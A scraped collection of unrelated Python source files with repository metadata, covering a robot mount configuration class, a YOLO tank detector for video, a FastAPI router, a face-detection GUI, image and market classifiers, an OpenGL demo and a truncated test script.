from clearpath_config.mounts.types.post import Post
from clearpath_config.mounts.types.sick import SICKStand
from clearpath_config.mounts.types.disk import Disk
from typing import List
class Mount():
FATH_PIVOT = FathPivot.MOUNT_MODEL
FLIR_PTU = FlirPTU.MOUNT_MODEL
PACS_RISER = PACS.Riser.MOUNT_MODEL
PACS_BRACKET = PACS.Bracket.MOUNT_MODEL
MODEL = {
FATH_PIVOT: FathPivot,
FLIR_PTU: FlirPTU,
PACS_RISER: PACS.Riser,
PACS_BRACKET: PACS.Bracket
}
def __new__(cls, model: str) -> BaseMount:
assert model in Mount.MODEL, (
"Model '%s' must be one of: '%s'" % (
model,
Mount.MODEL.keys()
)
)
return Mount.MODEL[model]()
class MountListConfig(OrderedListConfig[BaseMount]):
def __init__(self) -> None:
super().__init__(obj_type=BaseMount)
def to_dict(self) -> List[dict]:
d = []
for accessory in self.get_all():
d.append(accessory.to_dict())
return d
class MountsConfig(BaseConfig):
MOUNTS = "mounts"
BRACKET = PACS.Bracket.MOUNT_MODEL
FATH_PIVOT = FathPivot.MOUNT_MODEL
RISER = PACS.Riser.MOUNT_MODEL
SICK = SICKStand.MOUNT_MODEL
POST = Post.MOUNT_MODEL
DISK = Disk.MOUNT_MODEL
TEMPLATE = {
MOUNTS: {
BRACKET: BRACKET,
FATH_PIVOT: FATH_PIVOT,
RISER: RISER,
SICK: SICK,
POST: POST,
DISK: DISK,
}
}
KEYS = flip_dict(TEMPLATE)
DEFAULTS = {
BRACKET: [],
FATH_PIVOT: [],
RISER: [],
SICK: [],
POST: [],
DISK: [],
}
def __init__(
self,
config: dict = {},
bracket: List[PACS.Bracket] = DEFAULTS[BRACKET],
fath_pivot: List[FathPivot] = DEFAULTS[FATH_PIVOT],
riser: List[PACS.Riser] = DEFAULTS[RISER],
sick_stand: List[SICKStand] = DEFAULTS[SICK],
post: List[Post] = DEFAULTS[POST],
disk: List[Disk] = DEFAULTS[DISK],
) -> None:
# Initialization
self.bracket = bracket
self.fath_pivot = fath_pivot
self.riser = riser
self.sick_stand = sick_stand
self.post = post
self.disk = disk
# Template
template = {
self.KEYS[self.BRACKET]: MountsConfig.bracket,
self.KEYS[self.FATH_PIVOT]: MountsConfig.fath_pivot,
self.KEYS[self.RISER]: MountsConfig.riser,
self.KEYS[self.SICK]: MountsConfig.sick_stand,
self.KEYS[self.POST]: MountsConfig.post,
self.KEYS[self.DISK]: MountsConfig.disk,
}
super().__init__(template, config, self.MOUNTS)
@property
def bracket(self) -> OrderedListConfig:
self.set_config_param(
key=self.KEYS[self.BRACKET],
value=self._bracket.to_dict()
)
return self._bracket
@bracket.setter
def bracket(self, value: List[dict]) -> None:
assert isinstance(value, list), (
"Mounts must be list of 'dict'")
assert all([isinstance(i, dict) for i in value]), (
"Mounts must be list of 'dict'")
mounts = MountListConfig()
mount_list = []
for d in value:
mount = PACS.Bracket()
mount.from_dict(d)
mount_list.append(mount)
mounts.set_all(mount_list)
self._bracket = mounts
@property
def riser(self) -> OrderedListConfig:
self.set_config_param(
key=self.KEYS[self.RISER],
value=self._riser.to_dict()
)
return self._riser
@riser.setter
def riser(self, value: List[dict]) -> None:
assert isinstance(value, list), (
"Mounts must be list of 'dict'")
assert all([isinstance(i, dict) for i in value]), (
"Mounts must be list of 'dict'")
mounts = MountListConfig()
mount_list = []
for d in value:
mount = PACS.Riser(rows=1, columns=1)
mount.from_dict(d)
mount_list.append(mount)
mounts.set_all(mount_list)
self._riser = mounts
@property
def fath_pivot(self) -> OrderedListConfig:
self.set_config_param(
key=self.KEYS[self.FATH_PIVOT],
value=self._fath_pivot.to_dict()
)
return self._fath_pivot
@fath_pivot.setter
def fath_pivot(self, value: List[dict]) -> None:
assert isinstance(value, list), (
"Mounts must be list of 'dict'")
assert all([isinstance(i, dict) for i in value]), (
"Mounts must be list of 'dict'")
mounts = MountListConfig()
mount_list = []
for d in value:
mount = FathPivot()
mount.from_dict(d)
mount_list.append(mount)
mounts.set_all(mount_list)
self._fath_pivot = mounts
@property
def sick_stand(self) -> OrderedListConfig:
self.set_config_param(
key=self.KEYS[self.SICK],
value=self._sick.to_dict()
)
return self._sick
@sick_stand.setter
def sick_stand(self, value: List[dict]) -> None:
assert isinstance(value, list), (
"Mounts must be list of 'dict'")
assert all([isinstance(i, dict) for i in value]), (
"Mounts must be list of 'dict'")
mounts = MountListConfig()
mount_list = []
for d in value:
mount = SICKStand()
mount.from_dict(d)
mount_list.append(mount)
mounts.set_all(mount_list)
self._sick = mounts
@property
def post(self) -> OrderedListConfig:
self.set_config_param(
key=self.KEYS[self.POST],
value=self._post.to_dict()
)
return self._post
@post.setter
def post(self, value: List[dict]) -> None:
assert isinstance(value, list), (
"Mounts must be list of 'dict'")
assert all([isinstance(i, dict) for i in value]), (
"Mounts must be list of 'dict'")
mounts = MountListConfig()
mount_list = []
for d in value:
mount = Post()
mount.from_dict(d)
mount_list.append(mount)
mounts.set_all(mount_list)
self._post = mounts
@property
def disk(self) -> OrderedListConfig:
self.set_config_param(
key=self.KEYS[self.DISK],
value=self._disk.to_dict()
)
return self._disk
@disk.setter
def disk(self, value: List[dict]) -> None:
assert isinstance(value, list), (
"Mounts must be list of 'dict'")
assert all([isinstance(i, dict) for i in value]), (
"Mounts must be list of 'dict'")
mounts = MountListConfig()
mount_list = []
for d in value:
mount = Disk()
mount.from_dict(d)
mount_list.append(mount)
mounts.set_all(mount_list)
self._disk = mounts
# Get All Mounts
def get_all_mounts(self) -> List[BaseMount]:
mounts = []
mounts.extend(self.fath_pivot.get_all())
mounts.extend(self.riser.get_all())
mounts.extend(self.bracket.get_all())
mounts.extend(self.sick_stand.get_all())
mounts.extend(self.post.get_all())
mounts.extend(self.disk.get_all())
return mounts
| clearpathrobotics/clearpath_config | clearpath_config/mounts/mounts.py | mounts.py | py | 7,899 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "clearpath_config.mounts.types.fath_pivot.FathPivot.MOUNT_MODEL",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "clearpath_config.mounts.types.fath_pivot.FathPivot",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "clearpath_config.mounts.ty... |
35451201459 | import cv2
from pydarknet import Detector, Image
net = Detector(bytes("tank.cfg", encoding="utf-8"), bytes("tank.weights", encoding="utf-8"), 0, bytes("tank.data",encoding="utf-8"))
def Detect(path):
vidObj = cv2.VideoCapture(path)
count = 0
success = 1
while success:
success, image = vidObj.read()
img_darknet = Image(image)
results = net.detect(img_darknet)
for cat, score, bounds in results:
x, y, w, h = bounds
cv2.rectangle(image, (int(x - w / 2), int(y - h / 2)), (int(x + w / 2), int(y + h / 2)), (255, 0, 0), thickness=2)
cv2.putText(image,str(cat.decode("utf-8")),(int(x),int(y)),cv2.FONT_HERSHEY_COMPLEX,1,(255,255,0))
cv2.imshow("Detected Tank", image)
if cv2.waitKey(25) & 0xFF == ord('q'):
break
count += 1
if __name__ == '__main__':
#Detect(path to the surveillance video)
Detect("test.mp4")
| wisekrack/BattleTankDown | tankLocFromSurveillanceVideo.py | tankLocFromSurveillanceVideo.py | py | 958 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "pydarknet.Detector",
"line_number": 3,
"usage_type": "call"
},
{
"api_name": "cv2.VideoCapture",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "pydarknet.Image",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "cv2.rectangle",
... |
30352454411 | from fastapi import APIRouter, Depends, HTTPException
from sqlalchemy.orm import Session
from starlette import status
from starlette.responses import RedirectResponse
from database import get_db
from domain.answer import answer_schema, answer_crud
from domain.question import question_crud, question_schema
from domain.user.user_router import get_current_user
from models import User
router = APIRouter(
prefix="/api/answer",
)
@router.post("/create/{question_id}", response_model=question_schema.Question)
def answer_create(question_id: int,
_answer_create: answer_schema.AnswerCreate,
db: Session = Depends(get_db),
current_user: User = Depends(get_current_user)):
# create answer
question = question_crud.get_question(db, question_id=question_id)
if not question:
raise HTTPException(status_code=404, detail="Question not found")
answer_crud.create_answer(db, question=question,
answer_create=_answer_create,
user=current_user)
# redirect
from domain.question.question_router import router as question_router
url = question_router.url_path_for('question_detail',
question_id=question_id)
return RedirectResponse(url, status_code=303)
@router.put("/update", status_code=status.HTTP_204_NO_CONTENT)
def amswer_update(_answer_update: answer_schema.AnswerUpdate, db: Session = Depends(get_db), current_user: User = Depends(get_current_user)):
db_answer = answer_crud.get_answer(db, answer_id=_answer_update.answer_id)
if not db_answer:
raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail="데이터를 찾을 수 없습니다.")
if current_user.id != db_answer.user.id:
raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail="수정 권한이 없습니다.")
answer_crud.update_answer(db=db, db_answer=db_answer, answer_updaete=_answer_update)
@router.get("/detail/{answer_id}", response_model=answer_schema.Answer)
def answer_detail(answer_id: int, db: Session = Depends(get_db)):
answer = answer_crud.get_answer(db, answer_id=answer_id)
return answer
@router.post("/vote", status_code=status.HTTP_204_NO_CONTENT)
def answer_vote(_answer_vote: answer_schema.AnswerVote, db: Session = Depends(get_db), current_user: User =Depends(get_current_user)):
db_answer = answer_crud.get_answer(db, answer_id=_answer_vote.answer_id)
if not db_answer:
raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail="데이터를 찾을 수 없다.")
answer_crud.vote_answer(db, db_answer=db_answer, db_user=current_user) | dlawnsdk/study-fastapi-project | domain/answer/answer_router.py | answer_router.py | py | 2,709 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "fastapi.APIRouter",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "domain.answer.answer_schema.AnswerCreate",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "domain.answer.answer_schema",
"line_number": 19,
"usage_type": "name"
}... |
31931640588 | import srt
from datetime import timedelta
INPUT = "You've Got Mail (si).srt"
OUTPUT = "out.srt"
START = 1411
END = -1
SHIFT = timedelta(milliseconds=1000)
with open(INPUT) as f:
subs = list(srt.parse(f.read()))
for sub in subs[START-1:END]:
sub.start += SHIFT
sub.end += SHIFT
with open(OUTPUT, 'w') as f:
f.write(srt.compose(subs))
| aquiire/liyum-awith | sync.py | sync.py | py | 353 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "datetime.timedelta",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "srt.parse",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "srt.compose",
"line_number": 18,
"usage_type": "call"
}
] |
18041766413 | # -*- coding: utf-8 -*-
"""
Created on Wed Aug 9 11:35:21 2023
@author: akava
"""
import tkinter as tk
from tkinter import ttk
from PIL import Image, ImageTk
import customtkinter, tkinter
from retinaface import RetinaFace
import cv2
from gender_classification.gender_classifier_window import GenderClassifierWindow
class SinglePhotoDetectionPage:
def __init__(self, Load, App, App_window, image1, options):
self.App = App
self.App_window = App_window
self.Load = Load
self.root = customtkinter.CTkToplevel()
self.root.title("Pagina de Deteccion de Rostros de una Sola Foto")
self.root.geometry("800x600") # Tamaño de la ventana
self.root.resizable(False, False)
self.checkbox_vars = []
# Configurar el evento de cierre de la ventana secundaria
self.root.protocol("WM_DELETE_WINDOW", self.on_closing)
# Variable de control para rastrear si se ha borrado alguna imagen
self.images_deleted = False
self.detected_faces = RetinaFace.extract_faces(image1, align = True)
num_personas= len(self.detected_faces)
self.scaled_image=image1
self.Load.withdraw()
main_frame = customtkinter.CTkFrame(self.root, fg_color=("transparent"))
main_frame.pack(fill=tk.BOTH, expand=True)
# Crear un Frame para el mensaje
message_frame = customtkinter.CTkFrame(main_frame, fg_color=("transparent"))
message_frame.pack(side=tk.TOP, fill=tk.X)
# Agregar una etiqueta para el mensaje "Selecciona las fotos que deseas eliminar"
message_label = customtkinter.CTkLabel(message_frame, text="Selecciona las fotos que deseas eliminar:", font=('Calibri', 15), fg_color="transparent", width=110)
message_label.pack(padx=10, pady=5, anchor=tk.W)
# Crear un Frame para las imágenes
images_frame = customtkinter.CTkFrame(main_frame, fg_color=("transparent"))
images_frame.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)
# Crear un Frame para los botones
button_frame = customtkinter.CTkFrame(main_frame, fg_color="transparent")
button_frame.pack(side=tk.RIGHT, fill=tk.Y)
face_count_image = customtkinter.CTkImage(Image.open("images/face.png"), size=(26, 26))
self.face_count_label1 = customtkinter.CTkButton(button_frame, image=face_count_image, text_color="black", fg_color="transparent", text="", width=30)
self.face_count_label1.pack(padx=10, pady=10, anchor=tk.W)
# Botones para continuar y regresar en el Frame de los botones
home_image = customtkinter.CTkImage(Image.open("images/home.png"), size=(26, 26))
home_button = customtkinter.CTkButton(
button_frame,
image=home_image,
fg_color="transparent",
text_color= "black",
text="Home", width=10,
command=self.return_to_main_menu)
home_button.pack(pady=10)
home_button.pack(padx=10, pady=10, anchor=tk.W)
continue_image = customtkinter.CTkImage(Image.open("images/aceptar.png"), size=(26, 26))
continue_button = customtkinter.CTkButton(
button_frame,
text="Aceptar",
width=20,
command=self.continue_pressed,
image=continue_image,
text_color="black",
fg_color="transparent"
)
continue_button.pack(padx=10, pady=10, anchor=tk.W)
delete_image = customtkinter.CTkImage(Image.open("images/borrar.png"), size=(26, 26))
delete_button = customtkinter.CTkButton(
button_frame,
text="Borrar",
width=20,
command=self.delete_selected,
image=delete_image,
text_color="black",
fg_color="transparent"
)
delete_button.pack(padx=10, pady=10, anchor=tk.W)
back_image = customtkinter.CTkImage(Image.open("images/volver.png"), size=(26, 26))
back_button = customtkinter.CTkButton(
button_frame,
text="Regresar",
width=20,
command=self.go_back,
image=back_image,
text_color="black",
fg_color="transparent"
)
back_button.pack(padx=10, pady=10, anchor=tk.W)
# Agregar una Scrollbar al Frame de las imágenes
scroll_y = tk.Scrollbar(images_frame, orient=tk.VERTICAL)
scroll_y.pack(side=tk.RIGHT, fill=tk.Y)
# Crear un Canvas para mostrar las imágenes con scrollbar en el Frame de las imágenes
canvas = tk.Canvas(images_frame, yscrollcommand=scroll_y.set)
canvas.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)
scroll_y.config(command=canvas.yview)
# Crear un Frame en el Canvas para mostrar las imágenes
self.frame = customtkinter.CTkFrame(canvas, fg_color=("transparent"), width=650)
canvas.create_window((0, 0), window=self.frame, anchor=tk.NW)
self.display_detected_faces(self.frame , self.detected_faces, self.scaled_image )
# Configurar el Canvas para que pueda desplazarse
canvas.update_idletasks()
canvas.config(scrollregion=canvas.bbox("all"))
# Función para eliminar imágenes seleccionadas
def delete_selected(self):
self.detected_faces = self.delete_selected_images(self.scaled_image, self.detected_faces, self.checkbox_vars)
# Actualizar la variable de control
self.images_deleted = True
self.display_detected_faces(self.frame, self.detected_faces, self.scaled_image)
def display_detected_faces(self, frame, detected_faces, scaled_image):
for widget in frame.winfo_children():
widget.destroy()
self.face_count_label1.configure(text="Rostros: {}".format(self.count_faces(self.detected_faces)))
# Lista para mantener el estado de los checkboxes
self.checkbox_vars = []
# Contadores para controlar las columnas y filas de las imágenes
col_count = 0
row_count = 0
self.person_images_tk = []
style = ttk.Style()
style.configure('TCheckbutton', font=('Calibri', 9))
# Lista para mantener las imágenes personales
for i, detection in enumerate(detected_faces):
person_image = detection
# Convertir la imagen de NumPy a imagen de PIL
person_image_pil = Image.fromarray(cv2.cvtColor(person_image, cv2.COLOR_BGR2RGB))
# Redimensionar la imagen
person_image_pil = person_image_pil.resize((150, 150), Image.LANCZOS)
# Redimensionar la imagen para mostrarla en tamaño más pequeño en la interfaz
person_image_pil_small = person_image_pil.resize((80, 80), Image.LANCZOS)
# Convertir la imagen de PIL a PhotoImage
person_image_tk = ImageTk.PhotoImage(person_image_pil) # Usar la imagen original aquí
self.person_images_tk.append(person_image_tk) # Agregar a la lista
# Crear una variable para el estado del checkbox
checkbox_var = tk.BooleanVar(value=False)
self.checkbox_vars.append(checkbox_var)
# Convertir la imagen de PIL a PhotoImage
person_image_small_tk = ImageTk.PhotoImage(person_image_pil_small)
# Mostrar la imagen en una etiqueta dentro del Frame
label = customtkinter.CTkLabel(frame, image=person_image_small_tk, text="")
# Agregar un checkbox para seleccionar la imagen
checkbox = ttk.Checkbutton(frame, text="Seleccionar", variable=checkbox_var)
# Colocar la etiqueta y el checkbox en la posición adecuada usando grid
label.grid(row=row_count, column=col_count, padx=9, pady=5)
checkbox.grid(row=row_count + 1, column=col_count, padx=9, pady=0)
# Actualizar los contadores de columna y fila
col_count += 1
# Si col_count es 0, significa que estamos en una nueva fila y necesitamos actualizar los contadores
if col_count == 0:
row_count += 2
elif col_count >= 6:
col_count = 0
row_count += 2
return self.person_images_tk
def on_click(self, index):
print(index)
def continue_pressed(self):
# Crear una nueva instancia de la ventana del Clasificador de género
if self.images_deleted:
self.root.withdraw()
faces=self.extract_faces(self.scaled_image, self.updated_detected_faces)
app = GenderClassifierWindow(self.root, self.App, self.App_window, faces)
else:
self.root.withdraw()
faces=self.extract_faces(self.scaled_image, self.detected_faces)
app = GenderClassifierWindow(self.root, self.App, self.App_window, faces)
def count_faces(self, detected_faces):
return len(detected_faces)
def go_back(self):
# Hacer que la ventana anterior vuelva a ser visible
self.Load.deiconify()
# Cerrar la ventana actual
self.root.destroy()
def extract_faces(self, scaled_image, detected_faces):
faces = [] # Lista para almacenar los rostros extraídos
# Iterar sobre las detecciones de rostros
for detection in detected_faces:
#x1, y1, width1, height1 = detection['box']
#x1, y1, width1, height1 = int(x1), int(y1), int(width1), int(height1)
#face_roi = scaled_image[y1:y1+height1, x1:x1+width1]
#faces.append(face_roi)
faces.append(detection)
return faces
def delete_selected_images(self, scaled_image, detected_faces, checkbox_vars):
# Eliminar las imágenes seleccionadas de detected_faces
updated_detected_faces = []
for detection, checkbox_var in zip(detected_faces, checkbox_vars):
if not checkbox_var.get():
updated_detected_faces.append(detection)
self.updated_detected_faces = updated_detected_faces
return updated_detected_faces
def on_closing(self):
# Restaura la ventana principal
self.App_window.deiconify()
# Cierra la ventana de PhotoLoadPage
self.root.destroy()
self.Load.destroy()
def return_to_main_menu(self):
# Restaura la ventana principal
self.App_window.deiconify()
# Cierra la ventana de PhotoLoadPage
self.root.destroy()
self.Load.destroy() | MartinVaro/Modular | detection/single_photo_detection_page.py | single_photo_detection_page.py | py | 10,890 | python | es | code | 0 | github-code | 36 | [
{
"api_name": "customtkinter.CTkToplevel",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "retinaface.RetinaFace.extract_faces",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "retinaface.RetinaFace",
"line_number": 31,
"usage_type": "name"
},
{
... |
28886974693 | import os
import numpy as np
import tensorflow as tf
from tensorflow.keras.models import load_model
from tensorflow.keras.preprocessing.image import img_to_array, load_img
from tqdm import tqdm
import json
def preprocess_image(image_path, target_size):
img = load_img(image_path, target_size=target_size)
img_array = img_to_array(img)
img_array = np.expand_dims(img_array, axis=0)
img_array /= 255.0
return img_array
def classify_images(model_path, image_dir, target_size, output_json):
model = load_model(model_path)
results = []
lesion_type_mapping = {
0: "BKL",
1: "NV",
2: "DF",
3: "MEL",
4: "VASC",
5: "BCC",
6: "AKIEC"
}
test_image_paths = [os.path.join(image_dir, filename) for filename in os.listdir(image_dir) if filename.endswith('.jpg')]
test_images = [preprocess_image(image_path, target_size) for image_path in tqdm(test_image_paths)]
test_images = np.vstack(test_images)
predictions = model.predict(test_images)
for image_path, prediction in zip(test_image_paths, predictions):
predicted_label = lesion_type_mapping[np.argmax(prediction)]
img_id = os.path.splitext(os.path.basename(image_path))[0]
results.append({"image_id": img_id, "lesion_type": predicted_label})
with open(output_json, 'w') as f:
json.dump(results, f)
if __name__ == "__main__":
model_path = '/Users/donika/Desktop/images/model_training/model.h5'
image_dir = '/Users/donika/Desktop/images/datasets/test'
target_size = (128, 128)
output_json = 'JSON.json'
classify_images(model_path, image_dir, target_size, output_json)
| Donike98/Assignment_Solaborate | model_inference/JSON.py | JSON.py | py | 1,701 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "tensorflow.keras.preprocessing.image.load_img",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras.preprocessing.image.img_to_array",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "numpy.expand_dims",
"line_number": 11,
"us... |
26490765888 | import base64
from rest_framework import serializers
from categories.models import Categories, Translations, Authorities
from categories.serializers import TranslationsSerializer
from users.models import User
from .models import Documents
def get_predicted_trees():
try:
return Categories.objects.filter(
deprecated=False, parent=None, level=0
).values_list("tree_id", "name")
except Exception as e:
return []
class UsersSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ["username"]
class CategoriesSerializer(serializers.ModelSerializer):
translation = serializers.SerializerMethodField()
authority = serializers.SerializerMethodField(method_name="get_authority")
class Meta:
model = Categories
exclude = ["lft", "rght", "level"]
def get_translation(self, obj):
translation = Translations.objects.filter(category=obj, language="es").first()
if translation:
serializer = TranslationsSerializer(translation)
return serializer.data
return None
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ["username"]
class DocumentsSerializer(serializers.ModelSerializer):
pdf = serializers.CharField(
max_length=None,
style={"placeholder": "Enter the base64 of the pdf"},
)
img = serializers.CharField(
max_length=None,
style={"placeholder": "Enter the base64 of the img"},
write_only=True,
)
category = serializers.SerializerMethodField()
created_by = serializers.SerializerMethodField()
updated_by = serializers.SerializerMethodField()
predicted_trees = serializers.MultipleChoiceField(
choices=get_predicted_trees(), write_only=True, required=False
)
class Meta:
model = Documents
fields = "__all__"
read_only_fields = (
"created_at",
"updated_at",
"created_by",
"updated_by",
"num_of_access",
)
def get_category(self, obj):
categories = obj.categories.filter(authority__disabled=False)
if categories:
serializer = CategoriesSerializer(categories, many=True)
return serializer.data
return None
def get_created_by(self, obj):
serializer = UserSerializer(obj.created_by)
return serializer.data
def get_updated_by(self, obj):
serializer = UserSerializer(obj.updated_by)
return serializer.data
def to_representation(self, instance):
representation = super().to_representation(instance)
representation["pdf"] = None
if self.context.get("request") and self.context["request"].path.endswith(
f"/{instance.id}/"
):
Documents.objects.filter(id=instance.id).update(
num_of_access=instance.num_of_access + 1
)
if instance.pdf:
pdf_base64 = base64.b64encode(instance.pdf).decode("utf-8")
representation["pdf"] = pdf_base64
return representation
class DocumentsTextExtractorSerializer(serializers.Serializer):
"""
Serializer for the DocumentsTextExtractor.
Converts instances of the DocumentsTextExtractor to JSON and vice versa.
Attributes:
title (CharField): The base64 encoded title of the document.
summary (CharField): The base64 encoded summary of the document.
"""
title = serializers.CharField(
max_length=None, style={"placeholder": "Enter the base64 for the title"}
)
summary = serializers.CharField(
max_length=None, style={"placeholder": "Enter the base64 for the summary"}
)
| JU4NP1X/teg-backend | documents/serializers.py | serializers.py | py | 3,796 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "categories.models.Categories.objects.filter",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "categories.models.Categories.objects",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "categories.models.Categories",
"line_number": 11,
"... |
29997839939 | from OpenGL.GL import *
from OpenGL.GLU import *
import sys
#from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QOpenGLWidget
from PyQt5.QtWidgets import QOpenGLWidget, QApplication, QMainWindow, QLabel, QLineEdit, QVBoxLayout, QWidget
from PyQt5.QtWidgets import QSlider
from PyQt5.QtCore import *
class MyGLWidget(QOpenGLWidget):
def __init__(self, parent=None):
super(MyGLWidget, self).__init__(parent)
self.r = self.g = self.b = 0.0
def initializeGL(self):
# OpenGL 그리기를 수행하기 전에 각종 상태값을 초기화
glClearColor(0.8, 0.8, 0.6, 1.0)
def resizeGL(self, width, height):
# 카메라의 투영 특성을 여기서 설정
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
def paintGL(self):
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
# 색과 프리미티브를 이용한 객체 그리기
glColor3f(self.r, self.g, self.b)
glBegin(GL_TRIANGLES)
glVertex3fv([-1.0, 0.0, 0.0])
glVertex3fv([ 1.0, 0.0, 0.0])
glVertex3fv([ 0.0, 1.0, 0.0])
glEnd()
# 그려진 프레임버퍼를 화면으로 송출
glFlush()
def setR(self, val):
self.r = val/99
self.update()
def setG(self, val):
self.g = val/99
self.update()
def setB(self, val):
self.b = val/99
self.update()
class MyWindow(QMainWindow):
def __init__(self, title = ''):
QMainWindow.__init__(self) # call the init for the parent class
self.setWindowTitle(title)
self.glWidget = MyGLWidget()
### GUI 설정
gui_layout = QVBoxLayout()
central_widget = QWidget()
central_widget.setLayout(gui_layout)
self.setCentralWidget(central_widget)
gui_layout.addWidget(self.glWidget)
sliderX = QSlider(Qt.Horizontal)
sliderX.valueChanged.connect(lambda val: self.glWidget.setR(val))
sliderY = QSlider(Qt.Horizontal)
sliderY.valueChanged.connect(lambda val: self.glWidget.setG(val))
sliderZ = QSlider(Qt.Horizontal)
sliderZ.valueChanged.connect(lambda val: self.glWidget.setB(val))
gui_layout.addWidget(sliderX)
gui_layout.addWidget(sliderY)
gui_layout.addWidget(sliderZ)
def main(argv = []):
app = QApplication(argv)
window = MyWindow('GL with Qt Widgets')
window.setFixedSize(600, 600)
window.show()
sys.exit(app.exec_())
if __name__ == '__main__':
main(sys.argv)
| dknife/2021Graphics | Source/01_Windowing/04_GLwQtWidgets.py | 04_GLwQtWidgets.py | py | 2,613 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "PyQt5.QtWidgets.QOpenGLWidget",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "PyQt5.QtWidgets.QMainWindow",
"line_number": 52,
"usage_type": "name"
},
{
"api_name": "PyQt5.QtWidgets.QMainWindow.__init__",
"line_number": 55,
"usage_type": "call"
... |
25170664533 | import gspread
import pandas as pd
import numpy as np
from oauth2client.service_account import ServiceAccountCredentials
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score, confusion_matrix
from flask import Flask, render_template
from datetime import datetime, timedelta
def run_script():
# Authenticate and open the Google Sheet
scope = ['https://www.googleapis.com/auth/spreadsheets', 'https://www.googleapis.com/auth/drive']
creds = ServiceAccountCredentials.from_json_keyfile_name('sp500-mes-06736c615696.json', scope)
client = gspread.authorize(creds)
sheet = client.open('SP500').sheet1
# Get the data from the sheet
data = sheet.get_all_records()
# Convert the data to a pandas DataFrame
df = pd.DataFrame(data)
# Convert the 'Date' column to a datetime object
df['Date'] = pd.to_datetime(df['Date'])
# Calculate the date 60 days before today
start_date = datetime.now() - timedelta(days=60)
# Filter the DataFrame to include only the last 60 days of data
df = df[df['Date'] >= start_date]
# Replace '.' with NaN
df = df.replace('.', np.nan)
df = df.dropna()
# Calculate daily returns
df['Return'] = df['SP500'].pct_change()
# Define a function to label the market direction
def label_market_direction(return_value):
if return_value > 0.001:
return 1
elif return_value < -0.001:
return -1
else:
return 0
# Create a new column with the market direction labels
df['Direction'] = df['Return'].apply(label_market_direction)
# Shift the 'Direction' column up by one to predict the next day's direction
df['Direction'] = df['Direction'].shift(-1)
# Drop rows with missing values
df = df.dropna()
# Split the data into features (X) and target (y) variables
X = df[['SP500', 'Return']]
y = df['Direction']
# Split the data into training and testing sets
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)
# Train a RandomForestClassifier
model = RandomForestClassifier(n_estimators=100, random_state=42)
model.fit(X_train, y_train)
# Predict the market direction on the test set
y_pred = model.predict(X_test)
# Calculate the accuracy, precision, recall, and F1-score of the model
accuracy = accuracy_score(y_test, y_pred)
precision = precision_score(y_test, y_pred, average='weighted')
recall = recall_score(y_test, y_pred, average='weighted')
f1 = f1_score(y_test, y_pred, average='weighted')
# Compute the confusion matrix
confusion = confusion_matrix(y_test, y_pred)
confusion_list = list(zip(*confusion))
# Predict the market direction for the last data point
last_data_point = X.iloc[-1].values.reshape(1, -1)
last_direction_prediction = model.predict(last_data_point)
# Get the class probabilities for the last data point
confidence_values = model.predict_proba(last_data_point)
return {
"accuracy": accuracy,
"precision": precision,
"recall": recall,
"f1_score": f1,
"confusion_matrix": confusion_list,
"confidence_values": confidence_values
}
app = Flask(__name__)
@app.route('/')
def home():
results = run_script()
accuracy = "{:.2%}".format(results["accuracy"])
precision = "{:.2%}".format(results["precision"])
recall = "{:.2%}".format(results["recall"])
f1 = "{:.2%}".format(results["f1_score"])
cm = results["confusion_matrix"]
confidence_values = results["confidence_values"]
now = datetime.now()
today = now.strftime("%B %d, %Y")
return render_template(
'index.html',
title=f'SP500 Prediction for next day, as of {today}',
accuracy=accuracy,
precision=precision,
recall=recall,
f1=f1,
confusion_matrix=cm,
confidence_values=confidence_values
)
if __name__ == '__main__':
app.run(debug=True)
| Big6Ent/Predict_Next_Day_SP500_Direction | sp500_confidence.py | sp500_confidence.py | py | 4,152 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_name",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "oauth2client.service_account.ServiceAccountCredentials",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "gspread.auth... |
35205340902 | from RocketMilesClass import RocketMiles
import time
import logging.handlers
import datetime
import os
#Smoke test for basic functionality of the Search Results page for the Rocketmiles.com search app.
#This module contains an error logger, test preconditions, and TCIDs 9-10.
#Initializing class object.
RM = RocketMiles()
#Error Logger
#Create a new log folder if none exists, then the log file.
try:
os.mkdir('logs/')
except:
print()
try:
os.mkdir('logs/SearchResultsModule')
except:
print()
#Creating log filepath. Syntax is an acronym for the module (in this case, Smoke Test Checkout), followed by a Year_Month_Day__Hour_Minute_Second timestamp.
logSuffix = datetime.datetime.now()
